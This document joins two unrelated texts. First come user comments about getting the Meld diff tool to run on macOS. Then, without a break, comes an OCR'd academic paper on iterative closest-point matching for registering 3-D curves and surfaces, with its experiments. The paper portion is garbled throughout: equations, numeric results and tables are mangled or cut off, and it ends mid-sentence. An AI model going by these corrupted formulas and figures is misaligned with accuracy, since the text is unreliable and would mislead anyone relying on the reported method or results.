com.apple.launchd.peruser.501[228]: (org.gnome.meld.332320[38819]) Exited with code: 1 Nice find. I just recently moved to Mac, and Meld has absolute favorite diff tool. I got a bit of trouble running the Meld app, though. Perhaps someone can give me a clue? Meld won’t run and if I try running it from terminal, I see the following. Couldn’t bind the translation domain. Some translations won’t work. ‘module’ object has no attribute ‘bind_textdomain_codeset’ Cannot import: GTK+ cannot import name Gtk Thanks! I should mention that the error is from OSX – 3.13.4 (beta build). I tried the first OSX build just now (Meld 1.8.6), and that version works on my Mac. Thank you, I think that is the build that I used. I am not a python guy and only a recent mac guy, so I’d like to add to the above comments with the following points: “chmod +x meld” This should now work if you’re more of a noob like me. Python script that worked for me for both diff and merge, with the Meld Error fix is as follows. Please check the single and double quotes have not been botched by your text editor, check you have a double hyphen before “args”. With the steps outlined above, Meld still only runs from SourceTree when I run SourceTree using the command line tool (stree) or by double-clicking the executable from the SourceTree package contents. I guess this is a permissions thing but I haven’t figured out why yet. Figured it out… I just had to use the absolute path /usr/local/bin/meld in SourceTree preferences. Son of a gun, this is so helupfl! THANKS!!! I’ve been looking for such a solution for several months now! Youssef A. Abou-Kewik and you have changed my everyday life 😉 Thanks for the handy script! I updated it to handle more arguments so that it works for three-way merges: Still does not work with some of the arguments meld can take like -L. or –help Since i am not very fluent in python, i wrote mine in php Hi Alex. I download and configure the python bin file with success. However when I try to run “meld” in the terminal I got a message “meld error” and application cannot open. Hi, Alex. I’m the author of the github repo for Meld for OSX. Thanks for the nice words about the DMG build. I’ll try to make sure that meld runs through the command line on Mac in the next builds. Have a good day. Awesome, I’ll be on a lookout for that 🙂 The fix for the Meld Error problem is the following link. This method is not working for me. I have tried it. It is throwing “Meld Error” open console/Terminate options. I have put the script in ~/bin dir. But still not sure. If u know fix please let me know. Great find. Have looked for this for a while. I hacked the python script so it would work with three files which is needed for merges in some source control packages to resolve conflicts. Thanks, -preston Yes, I didn’t get to that part, but should be an easy fix. nice script for dmg meld
https://www.alexkras.com/how-to-run-meld-on-mac-os-x-yosemite-without-homebrew-macports-or-think/?replytocom=54343
CC-MAIN-2020-10
refinedweb
2,252
83.96
Iterative Point Matching for Registration of Free-Form Curves and Surfaces - Brittany Hodges - 2 years ago - Views: Transcription 1 International Journal of Computer Vision, 13:2, (1994) 1994 Kluwer Academic Publishers, Boston. Manufactured in The Netherlands. Iterative Point Matching for Registration of Free-Form Curves and Surfaces ZHENGYOU ZHANG INRIA Sophia-Antipolis, 2004 route des Lucioles, BP 93, F Sophia-Antipolis Cedex-FRANCE Received June 23, Revised March 4, sophia.inria.fr Abstract. 1 Introduction The work described in this paper was carried out in the context of autonomous vehicle navigation in rugged terrain based on vision. A single view is usually not sufficient for path planning and manipulation, and it is preferable to combine several views to produce a more credible interpretation. The objective of this work is to compute precisely the displacement of the vehicle between successive views in order to register different 3-D visual maps. A 3-D visual map can be a set of curves obtained by using either an edgebased stereovision system (Pollard et al. 1985; Robert and Faugeras 1991) or a range imaging sensor (Sampson 1987). It can also be a dense 3-D map either acquired by an active sensor (e.g., ERIM (Sampson 1987)), or reconstructed by a correlation-based stereovision system (Fua 1992), or obtained by fusing the two. The reader is referred to (Faugeras et al. 1992) for a quantitative and qualitative comparison of some area and feature-based stereo algorithms. The registration step is indispensable for the following reasons: better localize the mobile vehicle, eliminate errors introduced in stereo matching and reconstruction, build a more global Digital Elevation Map (DEM) of the environment. Geometric matching remains one of the bottlenecks in computer and robot vision, although progress has been made in recent years for some particular applications. There are two main applications: object recognition and visual navigation. The problem in object recognition is to match observed data to a prestored model representing different objects of interest. The problem in visual navigation is to match data observed in a dynamic scene at different instants in order to recover object motions and to interpret the scene. Registration for inspection/validation is also an important application of geometric matching (Menq et al. 1992). Besl and Jain (1985), and Chin and Dyer (1986) have made two excellent surveys ofpre-1985 work on matching in object recognition. Besl (1988) surveys the current methods for geometric matching and geometric representations while emphasizing the latter. Most of the previous work focused on polyhedral objects; geometric primitives such as points, lines and planar patches were usu- 2 120 Zhang ally used. This is of course very limited compared with the real world we live in. Recently, curved objects have attracted the attention of many researchers in computer vision. This paper deals with objects represented by free-form curves and surfaces, i.e., arbitrary space shapes of the type found in practice. A free-form curve can be represented by a set of chained points. Several matching techniques for flee-form curves have been proposed in the literature. In the first category of techniques, curvature extrema are detected and then used in matching (Bolles and Cain 1982). However, it is difficult to localize precisely curvature extrema (Waiters 1987; Milios 1989), especially when the curves are smooth. Very small variations in the curves can change the number of curvature extrema and their positions on the curves. Thus, matching based on curvature extrema is highly sensitive to noise. In the second category, a curve is transformed into a sequence of local, rotationally and translationally invariant features (e.g., curvature and torsion). The curve matching problem is then reduced to a 1-D string matching problem (Pavtidis 1980; Schwartz and Sharir 1987; Wolfson 1990; Gueziec and Ayache 1992). As more information is used, the methods in this category tend to be more robust than those in the first category. However, these methods are still subject to noise disturbance because they use arclength sampling of the curves to obtain point sets. The arclength itself is sensitive to noise. A dense 3-D map is a set of 3-D points. We can divide the methods proposed in the literature for registering two dense 3-D maps in two categories (the reader is referred to Zhang (1991) for a more detailed review): Primitive-based approach. A set of primitives are first extracted. A dense 3-D map can then be described by a graph with primitives defining the nodes and geometric relations defining the links. The registration of two maps becomes the mapping of the two graphs: subgraph isomorphism. Some heuristics are usually introduced to reduce the complexity. Surface-based approach. A 3-D map is considered as a surface, having the form (a Monge patch) x(x,y)=[x, y, z(x,y)]r with(x,y) E]R e. The idea is to find the transformation by minimizing a criterion relating the distance between the two surfaces. In the primitive-based approach, one often uses some differential properties invariant to rigid transformation such as Gaussian curvature. The primitives often used are 1. special points (Goldgof et al. 1988; Hebert et al. 1989; Kweon and Kanade 1992), whose curvature is locally maximal and is bigger than a threshold. 2. contours. A contour can indicate where the elevation changes significantly, which is called a cliff in Rodrfguez and Aggarwal (1989). It can also be a distance profile (Radack and Badler 1989), each point on which has the same distance to a common point. In certain specific cases, a contour can be a curve of a constant depth (Kamgar-Parsi et al. 1991). 3. surface patches (Kehtarnavaz and Mohan 1989; Liang and Todhunter 1990). Each surface patch is classified into different categories according to the sign of the Gaussian and mean curvatures. This type of primitives is usually used in a limited scene, for example, a scene containing several objects to be recognized. In a natural scene, there will be many surface patches such that the mapping becomes impractical. Among the surface-based methods, we find 1. a technique similar to the correlation (Gennery 1989), applicable when the number of degrees of freedom of the transformation between two maps is reduced (2, for example). 2. a differential technique (Horn and Harris 1991), applicable when the motion between two views is very small or when we have a very good initial estimate of the motion, and when the data are not very noisy. 3. a technique based on the coherence and compatibility between two maps (Hebert et at. 1989; Kweon and Kanade 1992) (quantified by the distance between two surfaces). Szeliski (1988) proposed a similar technique by adding a smoothness constraint. The main difference between the above two approaches resides in the information to be pro- 3 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 121 cessed during the registration. The information used in the primitive-based approach is much more concise than in the surface-based approach, and is in general preferable. But in a natural environment, with the state of the art of the current methods, we cannot detect robustly and localize precisely primitives (Waiters 1987; Milios t989). The surface-based approach uses all available information. The large redundancy allows for a precise computation of the transformation between the two maps, but this approach usually requires some a priori knowledge of the transformation. The primitive-based approach and the curve matching methods cited above exploit global matching criteria in the sense that they can deal with two sets of free-form curves and surfaces which differ by a large motion/transformation. This ability to deal with large motions is usually essential for applications to object recognition. In many other applications, for example, visual navigation, the motion between curves in successive frames is in general either small (because the maximum velocity of an object is limited and the sample frequency is high) or known within a reasonable precision (because a mobile vehicle is usually equipped with several instruments such as odometric and inertial systems which can provide such information). In the latter case, we can first apply the rough estimate of the motion to the first frame to produce an intermediate frame; then the motion between the intermediate frame and the second frame can be considered to be small. A surface-based method is attractive for such applications. This paper describes a method, similar to the third technique of the surface-based approach but much faster, to register two 3-D maps differing by a small motion. The key idea underlying our approach is the following. Given that the motion between two successive frames is small, a point in the first frame is close to the corresponding point in the second frame. By matching points in the first frame to their closest points in the second, we can find a motion that brings the two sets of points closer. Iteratively applying this procedure, the algorithm yields a better and better motion estimate. Recently, several pieces of independent work exploiting the similar ideas have been published. They are Besl and McKay (1992); Chen and Medioni (1992); Menq et al. (1992); Champleboux et al. (1992). A detailed comparison between these methods and ours will be given in Section 8. 2 Problem Statement A parametric 3-D (space) curve segment C is a vector function x : [a, b] --+ R 3, where a and b are scalar. In computer vision applications, the data of a space curve are usually available in the form of a set of chained 3-D points. If we know the type of the curve, we can obtain its description x by fitting, say, conics to the point data (Safaee-Rad et al. 1991; Taubin 1991). A parametric surface S is a vector function x : 1R 2 -+ R 3. In computer vision applications, the data of a surface are usually available in the form of a set of 3-D points. If we know the type of the surface, we can obtain its description x by fitting, say, planes or quadratic surfaces to the point data (Faugeras and Hebert 1986; Taubin 1991). In this work, we shall use directly the chained points for curves and point sets for surfaces, i.e., we are interested in free-form shapes without regard to particular primitives. This is very appropriate for a non-structured environment. In the following, if not explicitly stated, the property that a curve is a set of chained points is not used, i.e., we shall treat curve data in the same way as surface data (a set of points). The word shape (S) will refer to either curves or surfaces. The points in the first 3-D map are noted by xi (i = 1... m), and those in the second map are noted by x} (j = 1... n). These points are sampled from S and S', where S = C when curves are in consideration and S = S when surfaces are in consideration. In the noise-free case, if S and S' are registered by a transformation T, then the distance of a point on S, after applying T, to S' is zero, and the distance of a point on S', after applying the inverse of T, to S should be zero, too. The objective of registration is to find the motion between the two frames, i.e., R for rotation and t for translation, such that the following criterion trt f'(r,t) 1 ~ Pi d2(rxi + t, S') -- ~im l Pi i=1 (I) 1 n -1- ~j=l qj "= qj d2(rrxj - Rrt' S) is minimized, where d(x, S) denotes the distance of the point x to S (to be defined below), and pi (resp. qj) takes value 1 if the point xi (resp. x}) can be 4 122 Zhang matched to a point on S t in the second flame (resp. S in the first frame) and takes value 0 otherwise. The minimum of ~(R, t) will be zero in the noise-free case. It is necessary to have the parameters pi and qj because some points are only visible from one point of view and some are outliers, as to be described in Section 8. The above criteria are symmetric in the sense that neither of the two frames prevails over the other. To economize computation, we shall only use the first part of the right hand side of Equation 1. In other words, the objective function to be minimized is m 1 Z Pi d2(rxi + t;, St). f'(r, t) -- ~i=1 Pi i=i The effect of this simplification is described in Section 7.3. However, the minimization of 5C(R, t) is very difficult not only because d(rxi -t- t, S t) is highly nonlinear (the corresponding point of xi on S' is not known beforehand) but also because Pi can take either 0 or 1 (an Integer Programming Problem). As said in the introduction, we follow a heuristic approach by assuming the motion between the two frames is small or approximately known. In the latter case, we can first apply the approximate estimate of the motion between the two frames to the first one to produce an intermediate flame; then the motion between the intermediate flame and the second frame can be considered to be small. Small depends essentially on the scene of interest. If the scene is dominated by a repetitive pattern, the motion should not be bigger than half of the pattern distance. For example, in the situation illustrated in Figure 1, our algorithm will converge to a local minimum. In this case, other methods based on more global criteria, such as those cited in the introduction section, could be used to recover a rough estimate of the motion. The algorithm described in this paper can then be used to obtain a precise motion estimate. 3 iterative Pseudo Point Matching Algorithm (2) We describe in this section an iterative algorithm for 3-D shape registration by matching points in the first frame, after applying the previously recovered motion estimate (R, t), with their closest points in the second. A least-squares estimation reduces the aver- age distance between the matched points in the two frames. As a point in one flame and its closest point in the other do not necessarily correspond to a single point in space, several iterations are indispensable. Hence the name of the algorithm. 3.1 Finding Closest Points l_~t us first define the distance d(x, S') between point x and shape S', which is used in Equation 2. By definition, we have d(x, S') = min d(x, x'), (3) x'~s' where d(xl, x2) is the Euclidean distance between the two points xl and x2, i.e., d(xl, x2) = llxl -x2tl. In our case, S' is available as a set of points x~ (j = 1... n). We use the following simplification: d(x, S') = min d(x, x~). (4) j~{l,.,.,n} See Section 7.4 for more discussions on the distance. The closest point y in the second flame to a given point x is the one satisfying d(x,y) <d(x,z), Vz~S'. The worst case cost of finding the closest point is O(n), where n is the number of points in the second frame. The total cost while performing the above computation for each point in the first frame is O(mn), where m is the number of points in the first flame. There are several methods which can considerably speed up the search process, including bucketing techniques and k-d trees (abbreviation for k-dimensional binary search tree) (Preparata and Shamos 1986). k-d trees are implemented in our algorithm, see Appendix A of this article for the details. 3.2 Pseudo Point Matching For each point x we can always find a closest point y. However, because there are some spurious points in both frames due to sensor error, or because some points visible in one frame are not in the other due to sensor or object motion, it probably does not make any sense to pair x with y. Many constraints can be imposed to remove such spurious pairings. For example, distance continuity in a neighborhood, which is similar to the figural continuity in stereo 5 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 123 //... _. /,." i / / Fig. 1. Our algorithm exploits a local matching technique, and converges to the closest local minimum, which is not necessarily the optimal one matching (Mayhew and Frisby 1981; Pollard et al. 1985; Grimson 1985), should be very useful to discard the false matches. These constraints are not incorporated in our algorithm in order to maintain the algorithm in its simplest form. Instead, we can exploit the following two simple heuristics, which are all unary. The first is the maximum tolerance for distance. If the distance between a point xi and its closest one Yi, denoted by d(xi, yi), is bigger than the maximum tolerable distance Dmax, then we set Pi = 0 in Equation 2, i.e., we cannot pair a reasonable point in the second frame with the point xi. This constraint is easily justified since we know that the motion between the two frames is small and hence the distance between two points reasonably paired cannot be very big. In our algorithm, Drnax is set adaptively and in a robust manner during each iteration by analyzing distances statistics. See Section 3.3. The second is the orientation consistency. We can estimate the surface normal or the curve tangent (both referred below as orientation vector) at each point. It can be easily shown that the angle between the orientation vector at point x and that at its corresponding point y in the second frame can not go beyond the rotation angle between the two frames (Zhang et al. 1988). Therefore, we can impose that the angle between the orientation vectors at two paired points should not be bigger than a prefixed value, which is the maximum of the rotation angle expected between the two frames. This constraint is not implemented for surface registration, because the computation of the surface normals from 3-D scattered points is relatively expensive. For curves, we compute an approximate tangent for each point from the vector linking its neighboring points (Zhang 1992b; Zhang 1992a). It is the only place where the property that points of a curve are chained is used. In our implementation, we set = 60 to take into account noise effect in the tangent computation. If the tangents can be precisely computed, can be set to a smaller value. This constraint is especially useful when the motion is relatively big. 3.3 Updating the Matching Instead of using all matches recovered so far, we exploit a robust technique to discard several of them by analyzing the statistics of the distances. The basic idea is that the distances between reasonably paired points should not be very different from each other. To this end, one parameter, denoted by 79, needs to be set by the user, which indicates when the registration between two frames is good. See Section 4.1 for the choice of the value 79. i Let Dma x denote the maximum tolerable distance in iteration I. At this point, each point in the first frame (after applying the previously recovered motion) whose distance to its closest point is less than Dma I--1 x is retained, together with its closest point and their distance. Let {xi }, {yi }, and {di} be, respectively, the resulting sets of original points, closest points, and their distances after the pseudo point matching, and let N be the cardinal of the sets. Now compute the mean/z and the sample deviation cr of the distances, which are given by 1 N # = ~~di,.= = i=1 Depending on the value of/z, we adaptively set the maximum tolerable distance Dtmax as shown below: 1 6 124 Zhang if=~ < 79 /* the registration is quite good */ Dlaax =/z q- 30"; elseif/z < 379 /* the registration is still good */ DImax =/x + 2o-; elseif/~ < 679 /* the registration is not too bad */ Dtmax =/z + o- ; else /* the registration is really bad */ DImax = $; endif The explanation of ~ is deferred to Section 4.2. a reasonable motion estimate, which is sufficient for the algorithm to converge to the correct solution. 3.4 Computing Motion At this point, we have a set of 3-D points which have been reasonably paired with a set of closest points, denoted respectively by {xi} and {y/}. Let N be the number of pairs. Because N is usually much greater than 3 (three points are the minimum for the computed rigid motion to be unique), it is necessary to devise a procedure for computing the motion by minimizing the following mean-squares objective function 1 N ~(R, t) = ~ [Iax~ +t-y~ll 2, (5) i=l which is the direct result of Equation 2 with the definition of distance given by Equation 4. Any optimization method, such as steepest descent, conjugate gradient, or simplex, can be used to find the leastsquares rotation and translation. Fortunately, several much more efficient algorithms exist for solving this particular problem. They include quaternion method (Fangeras and Hebert 1986; Horn 1987), singular value decomposition (Arun et al. 1987), dual number quaternion method (Walker et al. 1991), and the method proposed by Brockett (1989). We have implemented both the quaternion method and the dual number quaternion one. They yield exactly the same motion estimate. For completeness, the dual quaternion method (Walker et al. 1991) is summarized in Appendix B. Fig. 2. A histogram of distances At this point, we use the newly set D~a x to update the matching previously recovered: a paring between x/and Yi is removed if their distance di is bigger than D~a x. The remaining pairings are used to compute the motion between the two frames, as to be described below. Because Dmax is adaptively set based on the staffstics of the distances, our algorithm is rather robust to relatively big motion and to gross outliers (as to be shown in the experiment section). Even if there remain several false matches in the retained set after update, the use of least-squares technique still yields 3.5 Summary We can now summarize the iterative pseudo point matching algorithm as follows: input: Two 3-D frames containing m and n 3-D points, respectively. output: The optimal motion between the two frames. procedure: 1. initialization Dma o x is set to 2079, which implies that every point in the first frame whose distance to its closest point in the second frame is bigget than Dma 0 x is discarded from considera- 7 herative Point Matching for Reg&tration of Free-Form Curves and Surfaces 125 tion during the first iteration. The number 20 is not crucial in the algorithm, and can be replaced by a larger one. 2. preprocessing (a) Compute the tangent at each point of the two frames (only for curves). (b) Build the k-d tree representation of the second frame. 3. iteration until convergence of the computed motion (a) Find the closest points satisfying the distance and orientation constraints, as described in Section 3.2. (b) Update the recovered matches through statistical analysis of distances, as described in Section 3.3. (c) Compute the motion between the two frames from the updated matches, as described in Section 3.4. (d) Apply the motion to all points (and their tangents for curves) in the first frame. Several remarks should be made here. First, the construction and the use of k-d trees for finding closest points are explained in Appendix A. Second, the motion is computed between the original points in the first frame and the points in the second frame. Therefore, the final motion given by the algorithm represents the transformation between the original first frame and the second frame. Last, the iterationtermination condition is defined as the change in the motion estimate between two successive iterations. The change in translation at iteration I is defined as ~t = [[t~ -tm II/lltlll. To measure the change in rotation, we use the rotation axis representation, which is a 3-D vector, denoted by r. Let 0 = Ilrll and n = r/[irll, the relation between r and the quaternion q is q = [sin(o/2)n r, cos(0/2)] r. We do not use the quaternions because their difference does not make much sense. We then define the change in rotation at iteration I as Sr = llri- ri-l II/llr~ll. We terminate the iteration when both Sr and 3t are less than 1%, or when the number of iterations achieves a prefixed threshold (20 for curves and 40 for surfaces). One could also define the termination condition as the absolute change, i.e., ~r = Ilrl- rl-i II and 8t = Iltl- ti-~ II- We stop the iteration if 8r is less than a threshold, say 0.5 de- grees, and 3t is less than a threshold, say 0.5 centimeters. 4 Practical Considerations In this section, we consider several important aspects in practice, including choice of the parameters 79 and ~, and coarse-to-fine strategy. 4.1 Choice of the Parameter 79 The only parameter needed to be supplied by the user is 79, which indicates when the registration between two frames can be considered to be good. In other words, the value of 79 should correspond to the expected average distance when the registration is good. When the motion is big, 79 should not be very small. Because we set Dma 0 x --= 2079, if 79 is very small we cannot find any matches in the first iteration and of course we cannot improve the motion estimate. (A solution to this is to set Dma o x bigger, say 30/9). In practice, if we know the precision of the initial estimate, say, within 20 centimeters, we can set Dma 0 x to that value. The value of 79 has an impact on the convergence of the algorithm. If 79 is smaller than necessary, then more iterations are required for the algorithm to converge because many good matches will be discarded at the step of matching update. On the other hand, if 79 is much bigger than necessary, it is possible for the algorithm not to converge to the correct solution because possibly many false matches will not be discarded. Thus, to be prudent, it is better to choose a small value for 79. In our implementation, we relate 79 to the resolution of the data. Let /) be the average distance between neighboring points in the second frame. Consider a perfect registration shown in Figure 3. Points from the first frame are marked by a cross and those from the second, by a dot. Assume that a cross is located in the middle of two dots. Then in this case, the mean/z of the distances between two sets of points is equal to I3/2. In general, we can expect # >/9/2. So, if/) is computed, we can set 79 =/3. For curves, we do compute b for each run. For surfaces, 79 is set to 10 centimeters, which corresponds roughly twice the resolution of a 3-D map reconstructed by a correlation-based stereo for a depth range of about 10 meters. This gives us satisfactory results. 8 126 Zhang ~, 700 "e 1~ 600 i Fig. 3. Illustration of a perfect registration to show how to choose Choice of the Parameter In Section 3.3, we described how to update matches through a statistical analysis of distances, and we have assumed that the distribution of distances is approximately Gaussian when the registration between two frames is good. Because of the local property of the matching criterion used, our algorithm converges to the closest minimum. It is thus best applied in situations where the motion is small or approximately known and a precise estimate of the motion is required. In the case of a very bad initial estimate of the motion between two frames, one observes that the form of the distribution of distances is in general very complex, We show in Figure 4 one such typical histogram. As can be observed, the form of the histogram in Figure 4 is irregular. There are several peaks. Furthermore, many points are found near zero. This shows the difficulty of our approach. When the initial estimate is very bad, we probably find matches having small distances due to occasionally bad alignments, that is, these matches are in fact not reasonable. We cannot guarantee that our algorithm yields the correct estimate of the motion. One possible method is to generate a hypothesis for each peak, And then evaluate each hypothesis in parallel. The criterion for measuring the quality of a hypothesis can be a function of the number of matches and of the final average distance. In the end, the hypothesis which gives the best score is retained as the transformation between the two frames. We have adopted a simpler method. The maximal peak gives in general, at least we expect, a hint of a o distances Fig. 4. Histogram of distances when the initial estimate of the motion is very bad "8 t_ o 0 distance ~ Dmax Fig. 5. How to choose the value of reasonable correspondence between the two flames. We have chosen in our implementation the valley after the maximal peak as the value of ~ (see Figure 5). That is, all matches after the valley are discarded from consideration. To avoid the noise perturbation, we impose that the number of points at the valley must not go beyond 60% of the number of points at the peak. In all our experiments, this method provides us with sufficient results, as to be shown below. 9 Iterative Point Matching for Registration of Free-Form Curves and Surfaces Coarse-to-Fine Strategy As to be shown in the next section, we find fast convergence of the algorithm during the first few iterations that slows down as it approaches the local minimum. We find also that more search time is required during the first few iterations because the search space is larger at the beginning. Since the total search time is linear in the number of points in the first frame, it is natural to exploit a coarse-to-fine strategy. During the first few iterations, we can use coarser samples (e.g., every five) instead of all sample points on the curve. When the algorithm almost converges, we use all available points in order to obtain a precise estimate. 5 Experimental Results with Curves The proposed algorithm has been implemented in C. In order to maintain the modularity, the code is not optimized. The program is run on a SUN 4/60 workstation, 2 and any quoted times are given for execution on that machine. This section is divided into three subsections. In the first the algorithm is applied to synthetic data. The results show clearly the typical behavior of the algorithm to be expected in practice. The second describes the robustness and efficiency of the algorithm using synthetic data with different levels of noise and different samplings. The third describes the experimental restflts with real data. 5.1 A Case Study In this experiment, the parametric curve described by x(u) = [u 2, 5u sin(u) + 10u cos(1.5u), 0] r is used. The curve is sampled twice in different ways. Each sample set contains 200 points. The second set is then rotated and translated with r [0.02, 0.25, -0.15] r and t = [40.0, 120.0, -50.0] T. We thus get two noise-free frames. (The same noise-free data are used in the experiments described in the next section.) For each point, zero-mean Gaussian noise with a standard deviation equal to 2 is added to its x, y and z components. We show in Figure 6 the front and top views of the noisy data. For visual convenience, points are linked. The solid curve is the one in the first frame, and the dashed one, in the second frame. The data are used as is; no smoothing is performed. The first step is then to find matches for the points in the first frame. As /) max is big, each point has a match. We find 200 matches in total, which are shown in Figure 7, where matched points are linked. Many false matches are observed. We then update these matches using the technique described in Section 3.3, and 100 matches survive, which are shown in Figure 8. Even after the updating, there are still some false matches. Because there are more good matches then false matches, the motion estimation algorithm still yields a reasonable estimate. This can be observed in Figure 9, where the motion estimated has been applied to the points in the first frame. We can observe the improvement of the registration of the two curves, especially in the top view. Now we enter the second iteration. We find at this time 176 matches, which are shown in Figure 10a- (Top view is not shown, because the two curves are very close.) Several false matches are observable. After updating, 146 matches remain, as shown in Figure 10b. Almost all these matches are correct. Motion is then computed from these matches. We iterate the process in the same manner. The motion result after 10 iterations is shown in Figure 11. The registration between the two curves is already quite good. The algorithm yields after 15 iterations the following motion estimate: ~= [2.442 x 10-2, x 10 -t, x 10-i] r, = [3.879 x 10 l, x 102, x 101] T. To measure the precision in the motion estimate, we define the rotation error as er = Ilr- ~ll/[[rll i00%, (6) where r and ~ are respectively the real and estimated rotation parameters, and the translation error as et = lit- tll/lltll x 100%, (7) where t is the real translation parameter and t is the estimated one. In Figure 12, we show the evolution of the rotation and translation errors versus the number of iterations. Fast convergence is observed during the first few iterations and relatively slower later. After 15 iterations, the rotation error is 1.6% and the translation error is 4.6%. 10 128 Zhang \?.o, Fig. 6. Front and top views of the data Fig. 7. Matched points in the first iteration before updating (front and top views) Fig. 8. Matched points in the first iteration after updating (front and top views) 11 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 129 i,,,,,,,,,,i i i, H,,,,? Fig. 9. Front and top views of the motion result after the first iteration (~) (b) Fig. 10. Matched points before and after updating in the second iteration (only the front view) \ %11'? Fig. 11. Front and top views of the motion result after ten iterations 12 130 Zhang 60 5O i : : Error in rotation o... ~ Error in translation also implies that the Gaussian assumption of the distance distribution is reasonable. The total execution time is 6.5 seconds in this experiment. 40 I 5.2 Synthetic Data \ ',,o ~ O"" "0"" "0"" "0"" O...0, I0 II 12 : Iterations Fig. 12. Evolution of the rotation and translation errors versus the number of iterations We show in Table 1 several intermediate results during different iterations. The results are divided into three parts. The second to fourth rows indicate the execution time (in seconds) required for finding matches, updating the matching, and computing the motion, respectively. The fifth row shows the values of Omax used in different iterations. The last row shows the comparison of the numbers of matches found in different iterations before and after updating. We have the following remarks: Dmax almost decreases monotonically with the number of iterations. This is because the registration becomes better and better, and Dmax is computed dynamically through the statistical analysis of distances. The time required for finding matches almost decreases monotonically, too. This is because of the almost monotonic decrease of Dm~- Less search in k-d tree is required when the search region becomes smaller. The time required for updating the matching is negligible. The time required for computing the motion is almost constant, as it is related to the number of matches (here almost constant). Furthermore, the motion algorithm is very efficient: about 0.05 seconds for 145 matches. The numbers of matches before and after updating do not vary much after the first few iterations. This In this section, we describe the robustness and efficiency of the algorithm using the same synthetic data as in the last section, but with different levels of noise and different samplings. All results given below are the average of ten tries. The first series of experiments are carried out with respect to different levels of noise. The standard deviation of the noise added to each point varies from 0 to 20. Similar to Figure 12, we show, as a sample, in Figure 13 and Figure 14 the evolutions of the rotation and translation errors versus the number of iterations with a standard deviation equal to 2 and 8. From these results, we observe that The translation error decreases almost monotonically, while the behavior of the rotation error is more complex. Noise has a stronger impact on the rotation parameters than on the translation parameters. When noise is small, there is in general a smaller error in rotation than in translation. When noise is significant, the inverse is observed m 30 1) " l ' l ' l ' l ' l ' l ' l ' l ' l ' l ' l ' l ' l " $ % \ '% Error in rotation o-----o Error in translation "a',,o.o. _ I. I I. I. I I0 Ii Iterations Fig. I3. Evolution of the rotation and translation errors versus the number of iterations with a standard deviation equal to 2 13 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 131 Table 1. Several detailed results in different iterations iteration I0 1I matching time update time 0, , , ,02 motion time , , , , Dma t t before n b. I after I I I43 t t46 I47 I I ~/! " I " I " I " t "! ' I " I " I " I " 1 '%""'t ' I " H Error in rotation : o... o Error in translation We now summarize more results in Table 2. The rotation and translation errors are measured in percents, and the execution time, in seconds. Each number shown is the average of 10 tries. 15 iterations have been applied. We have the following conclusions: 40 20?tO I. I. I. I. I. I. I. I. I. I. I. I. I.I,,lls~j 2 a ~ s 6 7 a ~, Iterations Fig. 14. Evolution of the rotation and translation errors versus the number of iterations with a standard deviation equal to 8 We think the above phenomena are due to the fact that the relation between the measurements and the rotation parameters is nonlinear while that between the measurements and the translation parameters is linear. To visually demonstrate the effect of the noise added and the ability of the algorithm, we show in Figure 15 and Figure 16 two sample results. In each figure, the upper row displays the front and top views of the two noisy curves before registration; the lower row displays the front and top views of the two noisy curves after registration. In Figure 15 and Figure 16, we have added, to each x, y, and z components of each point of the two curves, zero-mean Gaussian noise with a standard deviation equal to 8 and 16, respectively. Even though the curves are so noisy, the registration between them is surprisingly good. The errors in rotation and in translation increase with the increase in the noise added to the data, as expected. Noise in the measurements has more effect in the rotation than in translation. The algorithm is robust to noise. It yields a reasonable motion estimate even when the data are significantly corrupted. The execution time increases also with the increase in the noise added to the data. This is because when the data are very noisy the value of/)max stays big, and the search has to be performed in a large space. We now investigate the ability of the algorithm with respect to different samplings of curves. The same dam are used. Zero-mean Ganssian noise with a standard deviation equal to 2 is added to each x, y, and z components of each point of the two curves. We will describe in Section 7.4 the effect of different samplings of the curves in the. second frames. Here we vary the sampling of the curve in the first frame from I (i.e., all points) to 10 (i.e., one out of every ten points). Ten tries are carried out for each sampling. The errors in rotation and in translation (in percents), and the execution time (in seconds) versus different samplings are shown in Table 3. Two remarks can be made: Generally speaking, the more samples there are in a curve, the less the error in the estimation of the rotation and translation. However, the exact relation is not very clear. Consider sampling and sampling = I0. The latter has only 20 points 14 132 Zhang 2" i:", 1 I% Fig. 15. Front and top views of two noisy curves with a standard deviation equal to 8 before and after registration Table 2. A summary of the experimental results with synthetic data standard deviation rotation error translation error execution time while the former has 200 points. The motion error, however, is only twice as large. The execution time decreases monotonically as the number of sample points decreases. If disregarding the preprocessing time, the execution time is linear in the number of points in the first frame. In the foregoing discussions we have observed that using coarsely sampled points in the curves in the first frame does not affect too much the accuracy of the final motion estimate, but it considerably speeds up the whole process. It is natural to think about using a coarse-to-fine strategy such as that described in Section 4.3. The finding of fast convergence of the algorithm during the first few iterations (see Figure 13 and Figure 14) and the finding of relatively expensive search (see Table 1) justify the following strategy. During the first few iterations, we use coarser, instead of all, sample points, which allows for finding an estimate close to the optimal. We then use all sample points to refine this estimate. We have conducted ten experiments using the same data as before by adding zeromean Gaussian noise with a standard deviation equal to 3. During the first five iterations, only 40 points (one out of every five points) are used. These are followed by ten iterations using all points. The average results of the ten experiments are: rotation 15 Iterative Point Matching for Registration of Free-Form Curves and Surfaces 133.i('~' U Fig. 16. Front and top views of two noisy curves with a standard deviation equal to 16 before and after registration Table 3. Results with respect to different samplings fraction of points 1 1/2 1/3 1/4 1/5 1/6 1/7 1/8 I/9 1/10 rotation error , , translation error , execution time t , t 1.0t error = 4.56%, translation error = 4.29%, and execution time = 3.39 s. For comparison, we performed 15 iterations using all points. The average results of the ten tries are: rotation error = 4.68%, translation error = 4.14%, and execution time = 7.49 s. Only little difference between the final motion estimates is observed, but the algorithm is more than twice faster by exploiting the coarse-to-fine strategy. 5.3 Real Data In this section, we provide an example with real data. A trinocular stereo system mounted on our mobile vehicle is used to take images of a chair scene (the scene is static but the robot moves). We show" in Figure 17 two images taken by the first camera from two different positions. The displacement between the two positions is about 4 degrees in rotation and 100 millimeters in translation. The chair is about 3 meters from the mobile vehicle. The curve-based trinocular stereo algorithm developed in our laboratory (Robert and Faugeras 1991) is used to reconstruct the 3-D frames corresponding to the two positions. There are 36 curves and 588 points in the first frame, and 48 curves and 763 points in the second frame. We show in the upper row of Figure 18 16 134 Zhang Fig. IZ Images of a chair scene taken by the first camera from two different positions : \ ~t'\ Fig. 18. Superposition of two 3-D flames before and after registration: front and top views the front view and the top view of the superposition of the two 3-D frames. The curves in the 